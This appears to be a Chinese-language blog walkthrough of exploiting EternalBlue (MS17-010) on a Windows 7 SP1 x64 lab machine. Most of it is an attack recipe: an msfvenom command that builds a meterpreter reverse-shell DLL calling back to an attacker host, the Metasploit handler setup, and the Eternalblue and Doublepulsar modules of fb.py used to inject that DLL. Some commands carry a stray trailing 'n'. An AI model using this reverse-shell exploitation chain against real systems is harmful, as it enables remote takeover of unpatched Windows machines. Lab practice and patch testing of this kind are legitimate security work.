(內網測試)Eternalblue(MS17-010)測試windows 7 sp1 64位
kali linux :ip 192.168.0.107
目標機windows 7 sp1:ip 192.168.0.105
攻擊03:ip 192.168.0.106
微軟公告:Microsoft Security Bulletin MS17-010 - Critical
因為需要配合msf所以先生成一下DLL吧!
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT 4444 -f dll > testexp.dlln
接著先打開msf,進行配置
msfconsolen
使用hanlder模塊
use exploit/multi/hanldern
在設置payload
set payload windows/x64/meterpreter/reverse_tcpn
好,我們在看看需要設置的
show optionsn
埠默認就是4444不用設置,只需要在設置一下host
set LHOST 192.168.0.107n
ok,現在把生成好的dll拷貝回我們的03攻擊機上!
現在進入windows目錄,執行fb.py
第一步就是需要設置攻擊目標的ip和03攻擊機的ip了,這裡我們不使用這個輸入no
由於我們沒有D盤,這裡只能改一下設置了一個c盤的log(目錄可以自動創建)
這裡只有一個選擇就是創建項目,默認回車即可,然後輸入任意名稱
接著使用ETERNALBLUE這個模塊
use Eternalbluen
這裡需要注意下:
接下來就是使用msf生成的DLL了,使用Doublepulsar模塊
use Doublepulsarn
一路回車,到這裡還是需要注意一下選擇
選擇2(因為我們要用DLL嘛),並且設置DLL存放的目錄
kali上執行exploit
exploitn
回到03下在一路回車,最後輸入yes執行攻擊
最後攻擊成功
至於修復方法,我們可以360打個補丁就可以了!最後說明一下:被攻擊的目標可能會重啟,或者藍屏等問題!
推薦閱讀:
※NO.7 WebGoat還是蠻好的滲透練手工具
※跟著安全牛大表哥學滲透
※排名前20種功能強大的跨平台滲透測試工具
※一次漫長的滲透經歷(幫女神解決問題。)
TAG:渗透测试 |